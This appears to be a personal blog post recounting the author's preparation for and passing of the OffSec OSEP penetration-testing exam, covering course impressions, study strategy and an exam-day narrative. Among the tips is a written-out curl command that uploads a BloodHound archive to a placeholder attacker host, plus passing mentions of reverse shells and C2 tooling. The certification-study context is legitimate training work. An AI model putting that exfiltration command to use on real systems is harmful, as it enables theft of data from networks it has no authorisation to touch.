
my experience passing the osep cert

I recently passed the OSEP exam on the first attempt, achieving both independent requirements to pass: >=100 points and the slippery secret.txt flag. 💅

I wanted to solidify my internal pentesting skillz, since web hacking is more my comfort zone (check my OSWE cert review). So this was a great opportunity to push myself and learn in a challenging environment.

Here I’ll share my personal experience preparing for this exam.

spoiler

There will be no spoilers here. It’s just my personal experience, without anything that isn’t already public.

os-what?

The Offensive Security Experienced Pentester (OSEP) from OffSec is probably the most advanced active directory penetration testing cert, along with the Certified Active Directory Pentesting Expert (CAPE) from HackTheBox[1].

PEN-300: Advanced Penetration Testing is the course behind the OSEP certification, and it covers a wide range of internal penetration testing skills and techniques, including:

  • develop client-side attack techniques using Microsoft Office and other common applications, including building a reliable attack vector
  • master antivirus evasion methods and tools
  • bypass application whitelisting mechanisms like AppLocker
  • implement advanced lateral movement strategies in Windows and Linux environments
  • conduct sophisticated Active Directory exploitation and attacks to uncover hidden vulnerabilities
  • evade network detection systems, including IDS and IPS
  • perform advanced exploitation of Microsoft SQL and Active Directory
  • use advanced programming concepts and Win32 APIs for attack development

the course

Overall, the course is pretty well put together. The content is easy to follow and goes in-depth on relevant topics. Some sections aren’t strictly required for the exam, but it’s super helpful to know what’s under the hood.

Fun fact: I managed to escalate a sqli to an rce in a real engagement thanks to studying this cert. So just for that, I guess it was worth it, kek.

stuff I liked

  • the network section was accurate and aligned with what I’ve seen in real enterprise setups.
  • the demo of why and how the default meterpreter obfuscation gets flagged is 🔥.
  • the challenges’ attack paths cover the course material quite organically.
  • the adcs section has now been included!
  • phishing via ics calendar invites was very interesting and up to date.
  • pwning ci/cd pipelines opens a ton of possibilities for latmov. Learned a lot here!

stuff I didn’t *love*

  • post-exploitation is sometimes too permissive: once you’re local admin, you can do basically anything, like disabling defender and/or firewall rules.
  • few opsec refs/considerations, e.g. psexec usage, net user, etc.
  • some av bypasses are too naïve, e.g. vanilla process hollowing would get caught by Crowdstrike or any other competent EDR. That said, EDR evasion is a demanding field that requires constant updates, and this course does provide a solid baseline.
  • phishing is mostly vba macros and hta: both are a bit outdated (macros are disabled by default now) and easy to detect.

reqs

IMHO, the following skills matter:

  • ad hacking: being familiar with the core concepts and common offensive techniques.
  • programming background: being fluent with c# and powershell.
  • ctf experience: if you don’t have some background pwning boxes, you will struggle.
  • windows internals: nothing crazy, but knowing winapi, process and filesystem structure, etc. helps.

prep

I prepped for 1.5 months, and this was my strategy:

  1. reviewed external content listed in references.
  2. watched a selection of the course videos at 2x speed. Just the most challenging topics.
  3. actively read the book: highlighting important stuff and taking notes on useful commands.
  4. pwned the first 5 challenges. Thoroughly. Investigating all possible attack paths, e.g. dropper vs loader.
  5. re-reviewed my challenge solutions and forced myself to understand *all* the concepts behind the techniques: if you fall down a rabbit hole and treat everything as a black box, you’re asking for trouble.

r4nd0m tips

  • you can compile with mono to avoid visual studio. I basically managed to compile everything in kali and didn’t touch the windows lab machine[2]!
  • change the name of the artifacts because they don’t necessarily overwrite![3]
  • updog is god. You can host files but also exfil like: curl.exe http://attackerip/upload -F "file=@C:\Windows\tasks\20260415044445_BloodHound.zip" -F "path=./".
  • migrate your revshell processes for stability.
  • get comfortable with network pivoting.
  • become best friends with your c2 of choice. I personally reviewed the metasploit unleashed guide[4].
  • read the exam guide and the exam objectives. For instance, ai chatbots, paid tools and automated exploitation are not allowed.
  • IMHO, the challenges prepare you enough to face the exam. Although I’ve heard HTB RastaLabs and Offshore are good prep too.
  • have a plan z: there are too many variables involved, so if something fails, you need to know different alternatives.
  • take good notes before and *during* the exam. The environment is huge and you can get lost/overwhelmed easily.

resources

I came across a ton of resources, but here’s a curated list of the most practical ones.

OSEP-specific resources sorted by subjective usefulness:

warning

Be aware that some of these commands and scripts are now flagged, since the osep environment gets updated over time, so don’t be cocky and test everything before trying your luck on the exam.

Related off-topic resources:

Not strictly required, but the book “Evading EDR” from No Starch Press is 🔥.

my gig

Here was my arsenal of tools[6]:

And my kali setup:

exam

As you may already know, OffSec advanced exams give you 48h for the technical part and 24h to write the report. I knew it was going to be intense.

I grabbed a monster[7] and started it at 0100 AM. I promised myself I wouldn’t go to sleep until I got comfortable with the progress.

After 5 hours I had 30 points. I was feeling confident about the next steps, so I took a nap.

I woke up at 0930 AM. Then I made a lot of progress. Not everything is linear, and effort doesn’t always translate into flags. People always stress that if you’re stuck, don’t force it: take a walk. But I think the opposite is also true: if you’re on a roll, don’t stop digging. 🪏

Then I hit a wall after the 6th flag, so I took a walk to lower my cortisol levels. My plan: keep tryharding until day two, and if I still had no luck by then, switch to the second path and grab more flags there.

It was quite frustrating since I had a clear idea of what I wanted to do, but somehow it didn’t work. Finally, I caught it: I had missed a little syntax detail. 🤦‍♂️

So after ~23h I went to sleep with 9 flags in my pocket: I just needed one more. On day two, I woke up at 0800 AM. Then I pulled secret.txt at 1000 AM, which meant I met both independent criteria to pass: >=100 points and the secret.txt.

Finally, I crafted the report with sysreptor and sent it for review that same evening.

timeline

I asked Claude to create this fun timeline of my exam progress:

OSEP exam timeline

wh00t wh00t

Two days after the exam I received the beloved email from OffSec. I passed! Yay!

OSEP cert exam

Was it worth the sweat? Absolutely. Most of the content actually transfers to real engagements, which is what I really cared about.

Already deep into OSED prep. Will share that story here too whenever I make it through. Wish me luck! 🤞

  1. well, generalizing here: there are others like CRTO, CRTE, CRTL, etc. There’s no 1-to-1 comparison since each one focuses on a different angle: av/edr evasion, c2, etc.

  2. somehow slow AF.

  3. wasted hours because of this, kek.

  4. I used msf because I was more familiar with it and it aligns with the course content. That said, other options like Sliver also have success stories worth checking out.

  5. I had already purchased it when doing the PNPT cert a while ago.

  6. note that I’ve omitted the most obvious ones like mimikatz or secretsdump. Duh.

  7. not sponsored.
